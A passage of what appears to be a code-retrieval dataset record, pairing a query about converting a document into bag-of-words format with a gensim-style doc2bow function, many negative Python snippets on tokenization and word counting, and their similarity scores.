is tuple:\n tok, *additional_data = tok\n if tok:\n tokens.append(Token(terminal, tok, additional_data))\n return tokens", "def getList(self):\n return self.sorted_list.getList()", "def get_lists(self):\n return [{\"id\": lst[\"list_id\"], \"name\": lst[\"name\"]}\n for lst in List.objects(user_id=self.user_id, active=True)]", "def multiword_tokens(self):\n return self._mwts", "def 
control_bus_tokens(self):\n if self.lliagraph:\n return self.lliagraph.control_bus_tokens.items()\n else:\n return []", "def _parse_individual_tokens(self, tokens: List[str]) -> List:\r\n objs = []\r\n\r\n for token in tokens:\r\n obj = self._parse_token(token)\r\n objs.append(obj)\r\n\r\n return objs", "def get_tokens():\n return (AMS_MONITOR_PID_DIR,)" ]
[ "0.83647424", "0.80425704", "0.79461306", "0.79414326", "0.78283435", "0.75734204", "0.75067395", "0.7500921", "0.7500921", "0.7500921", "0.74711776", "0.74703306", "0.73524517", "0.72486407", "0.7219096", "0.7147502", "0.7132472", "0.7059246", "0.6929604", "0.69008", "0.68774545", "0.686128", "0.68404263", "0.6840318", "0.6819085", "0.67348593", "0.6730855", "0.67276204", "0.66702497", "0.66494155", "0.6629424", "0.6583703", "0.6573836", "0.6543659", "0.6498906", "0.6485851", "0.6470962", "0.6457", "0.64515626", "0.6442808", "0.6425382", "0.63887453", "0.6386064", "0.6385717", "0.6385717", "0.6379771", "0.6358245", "0.63545257", "0.63518584", "0.63429683", "0.63183314", "0.6314165", "0.6299709", "0.62857884", "0.62638175", "0.62050277", "0.61972135", "0.61802936", "0.6138678", "0.61276966", "0.6107711", "0.60978097", "0.6094398", "0.6072132", "0.60652035", "0.6059414", "0.60503453", "0.6047183", "0.6046054", "0.60413086", "0.60388184", "0.6032984", "0.6025284", "0.60188574", "0.60180384", "0.60169125", "0.5992728", "0.5977007", "0.5970087", "0.5955897", "0.59460896", "0.59249353", "0.59140575", "0.58983827", "0.58982646", "0.58917004", "0.58917004", "0.5873252", "0.5866376", "0.58663315", "0.5858681", "0.5853012", "0.5843518", "0.58341515", "0.58270955", "0.58259135", "0.5824618", "0.5824196", "0.5820515", "0.58200955", "0.5818195" ]
0.0
-1
Convert `document` into the bag-of-words (BoW) format = list of `(token_id, token_count)` tuples.
def doc2bow(self, document, allow_update=False, return_missing=False):
    doc = [t.text for t in document.tokens]
    if isinstance(doc, string_types):
        raise TypeError("doc2bow expects an array of unicode tokens on input, not a single string")

    # Construct (word, frequency) mapping.
    counter = defaultdict(int)
    for w in doc:
        counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1

    token2id = self.token2id
    if allow_update or return_missing:
        missing = sorted(x for x in iteritems(counter) if x[0] not in token2id)
        if allow_update:
            for w, _ in missing:
                # new id = number of ids made so far;
                # NOTE this assumes there are no gaps in the id sequence!
                token2id[w] = len(token2id)
    result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id}

    if allow_update:
        self.num_docs += 1
        self.num_pos += sum(itervalues(counter))
        self.num_nnz += len(result)
        # keep track of document and collection frequencies
        for tokenid, freq in iteritems(result):
            self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq
            self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1

    # return tokenids, in ascending id order
    result = sorted(iteritems(result))
    if return_missing:
        return result, dict(missing)
    else:
        return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_bag_words(document_tokenized):\n bag_words = dict()\n for token in document_tokenized:\n if token in bag_words.keys():\n bag_words[token] += 1\n else:\n bag_words[token] = 1\n return bag_words", "def sentencesToBow(documents):\n bowSentences = []\n dictionary = Dictionary(documents)\n\n numDocs = len(documents);\n avgDocLength = sum(map(len, documents))/numDocs\n for document in documents:\n bowSentence = []\n docLength = len(document)\n bowDoc = dictionary.doc2bow(document)\n for bowTerm in bowDoc:\n\n docTermFreq = bowTerm[1]\n termDocFreq = dictionary.dfs[bowTerm[0]]\n\n termWeight = docTermWeight(docTermFreq, termDocFreq, docLength, avgDocLength, numDocs, k=5, b=0.1)\n newBowTerm = (bowTerm[0], termWeight)\n bowSentence.append(newBowTerm)\n\n bowSentences.append(bowSentence)\n\n return bowSentences, dictionary", "def word_frequency(self, document):\n freq_table = {}\n words = nltk.word_tokenize(document)\n for word in words:\n if word in freq_table:\n freq_table[word] = freq_table.get(word) + 1\n else:\n freq_table[word] = 1\n # cut down the frequency table so that only common words are scored for\n freq_table = sorted(freq_table.items(), key=lambda x: x[1], reverse=True)\n scorable_words = []\n for word, occ in freq_table:\n # set threshold as words appearing x times or more - set to optimal valeue = 0\n # in hindsight this can just be deleted\n if int(occ) > 0:\n scorable_words.append(word)\n else:\n break\n self.sent_pos = self.sent_pos + 1 \n return scorable_words", "def gen_bag_of_words_df(self):\n\t\tdef word_vector(doc_text):\n\t\t\tfreqs = pd.Series(collections.Counter(doc_text.split()))\n\t\t\treturn freqs.loc[set(freqs.index.values)|set(self.stems)]\n\t\tself.bagofwords = self.dataframe.text.apply(word_vector).replace({np.nan:0})", "def bow_vec(doc):\n return CECTORIZER.transform([doc]).toarray()", "def bag_of_words(tokenized_sentence, all_words):\n\n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n #print(tokenized_sentence)\n bag = np.zeros_like(all_words, dtype=np.float32)\n for idx, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[idx] = 1.0\n\n return bag", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def tokenize(document):\n token = nltk.word_tokenize(document)\n\n output = [word.lower() for word in token if (word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\"))]\n\n return output", "def bow(tokens):\n return dict(collections.Counter(re.findall(r'\\w+', \" \".join(tokens))))", "def tokenize(document):\n\n # Unable to acquire 'stopwords' without these snippets due to my python config\n # import ssl\n # ssl._create_default_https_context = ssl._create_unverified_context\n # nltk.download('stopwords')\n\n stops = nltk.corpus.stopwords.words(\"english\")\n\n all_words = list()\n cleaned_words = list()\n\n all_words = nltk.word_tokenize(document)\n\n for word in all_words:\n word = word.strip()\n word = word.lower()\n\n if word in stops \\\n or not word \\\n or word in string.punctuation \\\n or word.strip(\"=\") != word:\n continue\n else:\n cleaned_words.append(word)\n\n return 
cleaned_words", "def featurize(self, data):\n \n bag_of_words = []\n\n tokens = data.split()\n\n for i in tokens:\n bag_of_words.append((i, True))\n\n return bag_of_words", "def preproc_doc(document):\n tokenizer = tokenization.FullTokenizer(\n vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n\n # document = [\n # tokenization.convert_to_unicode(\n # unidecode.unidecode(line.decode(\"utf-8\"))) for line in document\n # ]\n\n sent_tokens = [tokenizer.tokenize(sent) for sent in document if sent]\n sent_tokens = [sent for sent in sent_tokens if len(sent) > 1]\n if len(sent_tokens) < 8:\n return []\n\n # Convert token lists into ids and add any needed tokens and padding for BERT\n tf_example = convert_instance_to_tf_example(tokenizer, sent_tokens,\n FLAGS.max_sent_length,\n FLAGS.max_para_length)\n\n # Serialize TFExample for writing to file.\n tf_examples = [tf_example.SerializeToString()]\n\n return tf_examples", "def bagOfWords(self):\n if self._bow is None:\n self._bow = {}\n for word in self._words:\n if word['word'] in self._bow:\n self._bow[word['word']] += 1\n else:\n self._bow[word['word']] = 1\n return self._bow", "def get_tokenizer_result(blob):\n return list(blob.words)", "def gen_words(self, doc):\n pattern = re.compile(u'[\\\\s\\\\d,.<>/?:;\\'\\\"[\\\\]{}()\\\\|~!@#$%^&*\\\\-_=+a-zA-Z,。《》、?:;“”‘’{}【】()…¥!—┄-]+')\n doc = re.sub(pattern, ' ', doc)\n suffix_indexes = index_of_sorted_suffix(doc, self.max_word_len)\n word_cands = {}\n # compute frequency and neighbors\n for suf in suffix_indexes:\n word = doc[suf[0]:suf[1]]\n if word not in word_cands:\n word_cands[word] = WordInfo(word)\n word_cands[word].update(doc[suf[0] - 1:suf[0]], doc[suf[1]:suf[1] + 1])\n # compute probability and entropy\n length = len(doc)\n for k in word_cands:\n word_cands[k].compute(length)\n word_cands[k].compute_pp(self.pos_prop)\n # compute aggregation of words whose length > 1\n values = sorted(word_cands.values(), key=lambda x: len(x.text))\n for v in values:\n if len(v.text) == 1:\n continue\n v.compute_cohesion(word_cands)\n\n return sorted(values, key=lambda v: v.freq, reverse=True)", "def tokenize(document):\n words = [word.lower() for word in nltk.word_tokenize(document) if word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\") ]\n\n return sorted(words)", "def convert_word_to_count(counter={}, doc=[]):\n for sentence in doc:\n for word in sentence.split():\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n return counter", "def make_word_to_freq(self):\n\t\tword_to_freq = {}\n\t\tdocuments = self.tokenized_documents[\"train\"]\n\t\tfor document in documents:\n\t\t\tfor word in document:\n\t\t\t\tif not word in self.worddict: # make sure we have not found one of the pre-defined words\n\t\t\t\t\tword_to_freq[word] = word_to_freq.get(word, 0) + 1\n\t\t\n\t\treturn word_to_freq", "def tokenize(document):\n\n # Initialize the list of words, punctuation and stopwords\n keywords = []\n punctuations_list = string.punctuation\n stopwords_list = nltk.corpus.stopwords.words(\"english\")\n\n # Make a naive tokenized copy of the `document`\n naive_list = nltk.word_tokenize(document)\n\n for item in naive_list:\n\n # Ignore punctuations or stopwords\n if (item in punctuations_list) or (item in stopwords_list) or (len(item) < 4):\n continue\n\n # Add document by coverting all words to lowercase\n keywords.append(item.lower())\n\n return keywords", "def freq(word, document):\n return document.split(None).count(word)", "def 
getReviewsWithToken(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.doc_to_words_path, 'rb') as bin:\n tup = []\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n docid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # count words:\n count = 0\n for i in range(frequency):\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n if wordid == wordid_in_file:\n count += 1\n tup.append(docid_in_file)\n tup.append(count)\n return tuple(tup)", "def bagOfWords(self,phrase):\n return self._support.bagOfWords(phrase)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def get_doc(corpus):\n doc_info = []\n\n for idx, text in enumerate(corpus):\n count = len(word_tokenize(text))\n doc_info.append({'doc_length': count})\n\n return doc_info", "def vectorize_doc(document):\n # return document vector for tokenized input doc\n return bc.encode([document])[0]", "def tokenize(document):\n import string\n\n # tokenize the given document\n words = nltk.tokenize.word_tokenize(document)\n words = [word.lower() for word in words]\n\n # filter words from punctuations and stopwords\n loop_words = words.copy()\n for word in loop_words:\n if word in [char for char in string.punctuation] + nltk.corpus.stopwords.words(\"english\"):\n words.remove(word)\n\n return words", "def vocabulary(corpus_tokenized):\n vocab = list()\n for element in corpus_tokenized:\n document = element['document']\n for word in document:\n if word not in vocab:\n vocab.append(word)\n return vocab", "def num_bigram(doc):\n matched_spans = []\n matches = matcher(doc)\n for match_id, start, end in matches:\n span = doc[start:end]\n matched_spans.append(span)\n for span in matched_spans: # merge into one token after collecting all matches\n span.merge()\n return doc", "def doc2vec(self, doc):\n contained_words = self.cut_words(doc)\n vec = []\n for wrd in self.words:\n tf = contained_words.count(wrd) / len(contained_words)\n df = self.dfdict[wrd] + 1\n if wrd in contained_words: df += 1\n idf = log10((len(self.docs) + 1) / df)\n vec.append(tf * idf)\n return vec", "def wordCount(document):\n return float(len(document.split(None)))", "def corpus2mallet(self, corpus, file_like):\n for docno, doc in enumerate(corpus):\n if self.id2word:\n tokens = chain.from_iterable([self.id2word[tokenid]] * int(cnt) for tokenid, cnt in doc)\n else:\n tokens = chain.from_iterable([str(tokenid)] * int(cnt) for tokenid, cnt in doc)\n file_like.write(utils.to_utf8(\"%s 0 %s\\n\" % (docno, ' '.join(tokens))))", "def tokenize_into_words(myblob):\n set_constraint = re.compile(r'[^a-zA-Z0-9]')\n tokenize_to_text = set_constraint.split(myblob) # The blob is spilt into words and the given constraints are applied\n words = [word for word in tokenize_to_text if word]\n return words", "def tokenize_and_split_bis(sms_file):\n \n dic = {}\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n i = -1\n document = 0\n terms = 0\n new_document = True\n ham = True\n for line in open(sms_file, 'r').readlines():\n w = []\n document += 1\n new_document = True\n for word in line.split():\n i = i + 1\n if word == \"ham\":\n ham = True\n i = i - 1\n elif word == \"spam\":\n ham = False\n i = i - 1\n else:\n if word not in dic:\n dic[word] = 
i\n w.append(dic[word])\n list3.append(1)\n list4.append(1)\n new_document = False\n terms += 1\n else : \n i = i - 1\n w.append(dic[word])\n list4[dic[word]] += 1\n terms += 1\n if new_document: \n list3[dic[word]] += 1\n new_document = False\n \n if ham and w !=[]:\n list2.append(w)\n elif ham == False and w !=[]:\n list1.append(w)\n\n moy = 0\n len_dic = len(dic.keys())\n list5 = [0 for x in range(len_dic)]\n for key in dic.keys():\n if list4[dic[key]] > 0:\n tf = list4[dic[key]] / terms\n idf = math.log(document / list3[dic[key]])\n tfIdf = tf * idf\n list5[dic[key]] = tfIdf\n # print(\"the word \" + str(key) + \" appairs \" + str(list4[dic[key]]) + \" times.\")\n # print(\"his frequency is \" + str(list4[dic[key]] / terms) )\n # print(\"the word \" + str(key) + \" appairs \" + str(list3[dic[key]]) + \" times in each document.\")\n # print(\"his frequency is \" + str(idf))\n # print(\"utility \" + str(tfIdf))\n moy += tfIdf\n \n moy = moy / len_dic \n # print(moy)\n dic_bis = {}\n i = -1\n for key in dic.keys():\n value = list5[dic[key]]\n # print(str(value))\n if (value > oracle * moy):\n i += 1\n dic_bis[key] = i\n # else:\n # print(\"not pass \" + key + \" \" + str(value))\n \n \n # print(dic_bis == dic)\n # print(dic)\n return dic_bis,list1,list2", "def bag_of_words(batch, TEXT):\n V = len(TEXT.vocab)\n X = torch.zeros(batch.text.size(0), V)\n ones = torch.ones(batch.text.size(1))\n for b in range(batch.text.size(0)):\n X[b].index_add_(0, batch.text.data[b], ones)\n X[b][TEXT.vocab.stoi['<pad>']] = 0\n X = Variable(X, requires_grad=False)\n return X", "def extract_terms(document):\n tokens = word_tokenize(document)\n stemmer = PorterStemmer()\n terms = {} # Dictionary {term: appearances}\n word_count = 0 # To return total (meaningful) word count\n for token in tokens:\n token = token.lower() # Lowercase\n token = token.strip(string.punctuation) # Remove punctuation\n if token and token not in stopwords.words(\"english\"): # Remove stopwords\n token = stemmer.stem(token) # Using Porter Stemmer\n if token not in terms:\n terms[token] = 1\n else:\n terms[token] += 1\n word_count += 1\n return terms, word_count", "def get_words_with_nplus_frequency(tokenized_sentences, count_threshold):\r\n\r\n closed_vocab = []\r\n \r\n\r\n word_counts = count_words(tokenized_sentences)\r\n \r\n\r\n for word, cnt in word_counts.items(): # complete this line\r\n \r\n\r\n if cnt >= count_threshold:\r\n \r\n # append the word to the list\r\n closed_vocab.append(word)\r\n \r\n return closed_vocab", "def tokenize(document):\n words = nltk.word_tokenize(document)\n # tokenize files into a list of words\n return [\n word.lower() for word in words\n # filter out all punctuation (import string) and all stopwords\n if not all(char in string.punctuation for char in word) \n and word not in nltk.corpus.stopwords.words(\"english\")\n ]", "def bag_of_features(self, word, normalize=True):\n word_features = self.word_fts(word, normalize)\n features = [v + f for f in self.names for v in ['+', '0', '-']]\n bag = collections.OrderedDict()\n for f in features:\n bag[f] = 0\n vdict = {-1: '-', 0: '0', 1: '+'}\n for w in word_features:\n for (f, v) in w.items():\n bag[vdict[v] + f] += 1\n return numpy.array(list(bag.values()))", "def word_count(self, document):\n start_time = time.time()\n dictionary = dict()\n counter = defaultdict(int)\n for line in document.splitlines():\n for word in line.split():\n if word not in PUNCTUATION_MARK:\n counter[word] += 1\n for word, cnt in sorted(counter.items(), key=lambda x: (-x[1], 
x[0])):\n dictionary[word] = cnt\n self.log.info(\"Duration count dictionary: {duration}\".format(duration=float(time.time() - start_time)))\n return dictionary", "def countFreq(self,document):\n self.document = document\n vocab=['python','js','android','php','django','javascript','oracle','ruby','rails','java']\n cnt_vector = CountVectorizer(vocabulary=vocab)\n self.freq_term_matrix = cnt_vector.fit_transform(self.document)\n return self.freq_term_matrix.toarray()", "def tokenize(document):\n raw_words=[word.lower() for word in nltk.word_tokenize(document) if word.isalpha()]\n raw_words=[word.lower() for word in raw_words]\n final_words=[]\n for word in raw_words:\n if word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\"):\n final_words.append(word.lower())\n return final_words", "def word_frequency(book):\n unique_dict = unique_words(book)\n\n word_array = pd.DataFrame(list(unique_dict.items()), columns=['Word', 'Occurence'])\n\n return word_array", "def document_to_lda_features(lda_model, document):\n topic_importances = lda_model.get_document_topics(document, minimum_probability=0)\n topic_importances = numpy.array(topic_importances)\n return topic_importances[:,1]", "def parse_doc(doc,vocab):\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is not a-z or space\n words=doc.split()\n word_vocab=[vocab.get(word,-1) for word in words]\n words_dict=collections.Counter(word_vocab)\n del words_dict[-1] # ignore the words outside the vocabulary\n #wordid=words_dict.keys()\n #wordcnt=words_dict.values()\n return sorted(words_dict.items())", "def extract(self, document):\n f_num = len(self.feature_list)\n feature_vector = np.zeros((f_num,))\n words = document.split()\n for i in xrange(len(words)):\n for n in self.ns:\n ngram = self.try_get_ngram(words, n, i)\n if ngram and ngram in self.ngrams:\n self.add_ngram(feature_vector, ngram)\n return feature_vector", "def tokenize(document):\n nltk.download('punkt')\n nltk.download('stopwords')\n wordList = nltk.word_tokenize(document.lower())\n punctuation = string.punctuation\n stopWords = nltk.corpus.stopwords.words(\"english\")\n listCopy = copy.deepcopy(wordList)\n for w in listCopy:\n if w in stopWords or w in punctuation:\n newList = list(filter(w.__ne__, wordList))\n wordList = newList\n return wordList", "def count_words_sents(self, doc_array):\n total_num_sents = []\n total_num_words = []\n for doc in doc_array:\n sents = sent_tokenize(doc)\n total_num_sents.append(len(sents))\n temp_num_words = []\n for sent in sents:\n num_words = word_tokenize(sent)\n temp_num_words.append(len(num_words))\n total_num_words.append(temp_num_words)\n return np.array(total_num_sents), np.array(total_num_words)", "def bag_of_words_model(features, target):\n target = tf.one_hot(target, 2, 1, 0)\n features = tf.contrib.layers.bow_encoder(\n features, vocab_size=n_words, embed_dim=Embedding_size, scope=\"input_layer\")\n hidden_layer1 = tf.contrib.layers.fully_connected(features, 100, scope=\"hidden_layer1\")\n logits = tf.contrib.layers.fully_connected(hidden_layer1, 2, scope=\"output_layer\",\n activation_fn=None)\n loss = tf.contrib.losses.softmax_cross_entropy(logits, target)\n train_op = tf.contrib.layers.optimize_loss(\n loss, tf.contrib.framework.get_global_step(),\n optimizer='Adam', learning_rate=0.01)\n return (\n {'class': tf.argmax(logits, 1),\n 'prob': tf.nn.softmax(logits)},\n loss, train_op)", 
"def get_vocabulary(documents):\n cv_model = CountVectorizer(binary=True)\n cv_model.fit(documents)\n\n vocabulary = cv_model.get_feature_names()\n vocabulary = list(map(str, vocabulary))\n\n return vocabulary", "def get_word_frequency(self, word, document):\n return self.dictionary[word]['docs'][document]", "def get_number_of_words_in_document(self, document):\n for _set in self.sets:\n if document in _set:\n return self.sets[_set][document]['number_of_words']", "def tfidf_bow(doc):\n\n if VECTORIZER == None:\n sys.stderr.write(\"ERROR: Vectorizer not defined... Did you call set_vocab?\\n\")\n return None\n return VECTORIZER.transform([doc]).toarray()", "def lookup_bm25(self) -> list:\n prox_by_doc = {}\n for token in self._tokenizer.tokenize(self._query):\n for token_info in self._index.get_token_search(token):\n doc = token_info.doc\n if doc not in prox_by_doc:\n prox_by_doc[doc] = 0\n prox_by_doc[doc] += token_info.weight\n\n return sorted(prox_by_doc.items(), key=lambda t: t[1], reverse=True)", "def doc2features(self,sent):\n return [self.word2features(sent['tokens'], i) for i in range(len(sent['tokens']))]", "def word_occurrences(corpus):\n occur_array = []\n\n for e in corpus:\n occur = Counter(e)\n occur_array.append(occur)\n\n return occur_array", "def mapWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n return token_map", "def create_bow(vocab, filepath):\n bow = {}\n # TODO: add your code here\n wordcount = 0\n wordcountnone = 0\n c = 0\n\n for i in vocab:\n c+=1\n with open(filepath, 'r', encoding=\"utf-8\") as doc: ###############################################\n for word in doc:\n word = word.strip()\n if(c==1):\n if (word not in vocab):\n wordcountnone += 1\n if(i == str(word)):\n wordcount += 1\n #print(wordcount)\n if(wordcount > 0):\n bow[i] = wordcount\n wordcount = 0\n if(wordcountnone != 0):\n bow[None] = wordcountnone\n return bow", "def compute_tf(document):\r\n _len = len(document)\r\n tf_dict = {}\r\n for token in document:\r\n tf_dict.setdefault(token, 0.0)\r\n tf_dict[token] += 1 / _len\r\n\r\n return tf_dict", "def preprocess(document, max_features=150, max_sentence_len=300):\n\n def lemmatize(token, tag):\n \"\"\"\n Converts the tag to a WordNet POS tag, then uses that\n tag to perform an accurate WordNet lemmatization.\n \"\"\"\n tag = {\n 'N': wn.NOUN,\n 'V': wn.VERB,\n 'R': wn.ADV,\n 'J': wn.ADJ\n }.get(tag[0], wn.NOUN)\n\n return WordNetLemmatizer().lemmatize(token, tag)\n\n def vectorize(doc, max_features, max_sentence_len):\n \"\"\"\n Converts a document into a sequence of indices of length max_sentence_len retaining only max_features unique words\n \"\"\"\n tokenizer = Tokenizer(num_words=max_features)\n tokenizer.fit_on_texts(doc)\n doc = tokenizer.texts_to_sequences(doc)\n doc_pad = pad_sequences(doc, padding='pre', truncating='pre', maxlen=max_sentence_len)\n return np.squeeze(doc_pad), tokenizer.word_index\n\n cleaned_document = []\n vocab = []\n\n # Break the document into sentences\n for sent in document:\n\n # Clean the text using a few regular expressions\n sent = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", sent)\n sent = re.sub(r\"what's\", \"what is \", sent)\n sent = re.sub(r\"\\'\", \" \", sent)\n sent = re.sub(r\"@\", \" \", sent)\n sent = re.sub(r\"\\'ve\", \" have \", sent)\n sent = re.sub(r\"can't\", \"cannot \", sent)\n sent = re.sub(r\"n't\", \" not \", sent)\n sent = re.sub(r\"i'm\", \"i am \", sent)\n sent = re.sub(r\"\\'re\", \" are \", sent)\n sent = 
re.sub(r\"\\'d\", \" would \", sent)\n sent = re.sub(r\"\\'ll\", \" will \", sent)\n sent = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", sent)\n sent = sent.replace(\"\\n\", \" \")\n\n lemmatized_tokens = []\n\n # Break the sentence into part of speech tagged tokens\n for token, tag in pos_tag(wordpunct_tokenize(sent)):\n\n # Apply preprocessing to the tokens\n token = token.lower()\n token = token.strip()\n token = token.strip('_')\n token = token.strip('*')\n\n # If punctuation ignore token and continue\n if all(char in set(string.punctuation) for char in token) or token in set(sw.words('english')):\n continue\n\n # Lemmatize the token\n lemma = lemmatize(token, tag)\n lemmatized_tokens.append(lemma)\n vocab.append(lemma)\n\n cleaned_document.append(lemmatized_tokens)\n\n vocab = sorted(list(set(vocab)))\n\n return cleaned_document, vocab", "def get_counts(self):\n counts = {}\n for document in self.docs:\n for word in document:\n if word not in counts.keys():\n counts[word] = 1\n else:\n counts[word] += 1\n return counts", "def collocationFinder(document,nbest=4):\n\tchain = lambda x : list(itertools.chain(*pos.tokenize_words(pos.tokenize_sents(x))))\n\tstopset = set(stopwords.words('english'))\n\tfilter_stops = lambda w: len(w) < 3 or w in stopset\n\tbcf = BigramCollocationFinder.from_words(chain(document))\n\tbcf.apply_word_filter(filter_stops)\n\treturn bcf.nbest(BigramAssocMeasures.likelihood_ratio, 4)", "def compute_frequencies(num_words, documents):\n res = [0 for i in range(num_words)]\n sum = 0\n for word in documents:\n sum += 1\n tmp = set(word)\n for number in tmp:\n res[number] += 1\n \n res = [i / sum for i in res]\n return res", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def build_vocab(self, min_count=3):\n word2count = defaultdict(int)\n for sentence in self.tokenized_corpus:\n for word in sentence:\n word2count[word] += 1\n\n word2dict = {}\n word2dict['PAD'] = {'id': 0}\n word2dict['UNK'] = {'id': 1}\n for word in word2count:\n if word2count[word] >= min_count:\n word2dict[word] = {'id': len(word2dict), 'count': word2count[word]}\n self.vocab = word2dict", "def computeWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n # print token_map.items()\n return sorted(token_map.items(), key = lambda x : x[1], reverse = True)", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def get_distribution(doc):\n word_count = {}\n word_count = clean(doc, word_count)\n factor = 1.0 / sum(word_count.values())\n dist = {k: v * factor for k, v in word_count.items()}\n return dist", "def getTokenCollectionFrequency(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.word_to_docs_path, 'rb') as bin:\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # skip documents:\n int.from_bytes(bin.read(4 * frequency), 'big')\n if wordid_in_file == 
wordid:\n return frequency\n return 0", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def createBagOfWords(df, n):\n from nltk.tokenize import word_tokenize\n from nltk.corpus import stopwords\n import string\n from collections import Counter\n from nltk.stem.porter import PorterStemmer\n \n ps = PorterStemmer()\n stop_words = set(stopwords.words('english') + list(string.punctuation) + ['...' , ',' , '“', '”', '.', 'fig', '.fig'])\n \n dfDict = {}\n# df['count'] = df.groupby('Text')['Text'].transform(pd.Series.value_counts)\n# df.sort_values('count', ascending = False)\n# df.drop('count', axis = 1)\n dfLength = len(df.index)\n for i in range(1, dfLength):\n text = df['Text'][i]\n if dfDict.__contains__(text):\n df['Text'][i] = dfDict.get(text)\n else:\n textModified = text.lower()\n textModified = textModified.replace(',', '')\n textModified = textModified.replace('.', '')\n textModified = textModified.split()\n textModified = [ps.stem(word) for word in textModified if not word in set(stop_words) and len(word) > 1]\n textModified = ' '.join(textModified)\n df['Text'][i] = textModified\n dfDict[text] = textModified\n \n from sklearn.feature_extraction.text import CountVectorizer\n cv = CountVectorizer()\n textBagOfWords = cv.fit_transform(df['Text']).toarray()\n textBagOfWords = pd.DataFrame(textBagOfWords)\n df = df.drop(['Text'], axis = 1)\n df = pd.concat([df, textBagOfWords], axis = 1)\n return df", "def doc2idx(self, document, unknown_word_index=-1):\n if isinstance(document, string_types):\n raise TypeError(\"doc2idx expects an array of unicode tokens on input, not a single string\")\n\n document = [word if isinstance(word, unicode) else unicode(word, 'utf-8') for word in document]\n return [self.token2id.get(word, unknown_word_index) for word in document]", "def bow(data_frame, description):\n text = list(data_frame['article'])\n vectorizer = CountVectorizer(stop_words='english') # create the transform\n vectorizer.fit(text) # tokenize and build vocab\n # save bow vectorizer as pickle\n with open('resources/bow_encoder_' + description + '.pkl', 'wb') as f:\n pickle.dump(vectorizer.vocabulary_, f)\n f.close()\n data_frame['bow'] = data_frame['article'].apply(lambda x: vectorizer.transform([x]))\n return data_frame", "def extract_features(document):\n document_words = set(document)\n features = {}\n global word_features\t\n for word in word_features:\n features['contains(%s)' % word] = (word in document_words)\n return features", "def q_tokenize(document):\n final_words = []\n avoided_words = [] # WORDS WHICH ARE TO BE AVOIDED IN THE FINAL LIST\n \n # making the avoided_words list\n for word in string.punctuation: # the string library has a string of punctuations\n avoided_words.append(word)\n for word in nltk.corpus.stopwords.words(\"english\"): # the nltk lib. 
has a list of stopwords commonly used in english\n avoided_words.append(word)\n\n tokens = nltk.word_tokenize(document)", "def wordbag( text, ignore_words = Ignore_words ) :\n iter = (stripword(s) for s in text.lower().split() if stripword(s) not in ignore_words)\n result = {}\n for x in iter :\n if result.has_key(x) :\n result[x] += 1\n else :\n result[x] = 1\n return result", "def bin_inscriptions(corpus):\n doc_bin = DocBin(attrs=[\"LEMMA\",\"TAG\",\"POS\",\"DEP\",\"HEAD\"], store_user_data=True)\n for c in corpus:\n doc = nlp(c)\n doc_bin.add(doc)\n\n with open('dbg.bin','wb') as f:\n f.write(doc_bin.to_bytes())", "def get_words(doc):\n splitter = re.compile('\\\\W*')\n # Split the words by non-alpha characters\n words = [s.lower() for s in splitter.split(doc) \n if len(s)>2 and len(s)<20]\n # Return the unique set of words only\n return dict([(w,1) for w in words])", "def get_document_complexe_tags(self, document):\n kw_extractor = yake.KeywordExtractor(lan=\"en\", n=3, top=30)\n keywords = kw_extractor.extract_keywords(document)\n\n complexe_tag = []\n for keyword in keywords:\n if keyword[-1] >= 